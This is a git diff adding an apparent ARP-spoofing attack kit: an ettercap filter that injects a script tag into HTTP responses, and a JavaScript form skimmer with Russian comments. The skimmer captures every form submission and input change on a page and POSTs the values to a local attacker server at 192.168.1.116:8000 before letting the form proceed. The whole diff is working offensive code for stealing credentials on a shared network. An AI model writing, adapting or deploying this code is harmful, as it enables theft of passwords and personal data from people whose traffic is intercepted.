diff --git a/arpspoofing/thief/exploit.ef b/arpspoofing/thief/exploit.ef
new file mode 100644
index 0000000..e61b92b
Binary files /dev/null and b/arpspoofing/thief/exploit.ef differ
diff --git a/arpspoofing/thief/js_thief.js b/arpspoofing/thief/js_thief.js
new file mode 100644
index 0000000..a589d12
--- /dev/null
+++ b/arpspoofing/thief/js_thief.js
@@ -0,0 +1,32 @@
+document.addEventListener('DOMContentLoaded', function() {
+  // Перехватываем все формы на странице
+  const forms = document.getElementsByTagName('form');
+  for (let form of forms) {
+    form.addEventListener('submit', function(e) {
+      e.preventDefault(); // Блокируем стандартную отправку
+      const data = new FormData(form);
+      let stolenData = {};
+      for (let [key, value] of data.entries()) {
+        stolenData[key] = value;
+      }
+      
+      // Отправляем данные на ваш сервер
+      fetch('http://192.168.1.116:8000/log', {
+        method: 'POST',
+        body: JSON.stringify(stolenData),
+        headers: { 'Content-Type': 'application/json' }
+      }).then(() => form.submit()); // Отправляем форму после кражи
+    });
+  }
+
+  // Перехватываем ввод в реальном времени (если формы нет)
+  const inputs = document.getElementsByTagName('input');
+  for (let input of inputs) {
+    input.addEventListener('change', function() {
+      fetch('http://192.168.1.116:8000/log', {
+        method: 'POST',
+        body: JSON.stringify({ [input.name]: input.value })
+      });
+    });
+  }
+});
diff --git a/arpspoofing/thief/xss_exploit.js b/arpspoofing/thief/xss_exploit.js
new file mode 100644
index 0000000..099ef94
--- /dev/null
+++ b/arpspoofing/thief/xss_exploit.js
@@ -0,0 +1,3 @@
+if (ip.proto == TCP && tcp.src == 80) {
+  replace(/<\/head>/i, '<script src="http://192.168.1.116:8000/js_thief.js"></script></head>');
+}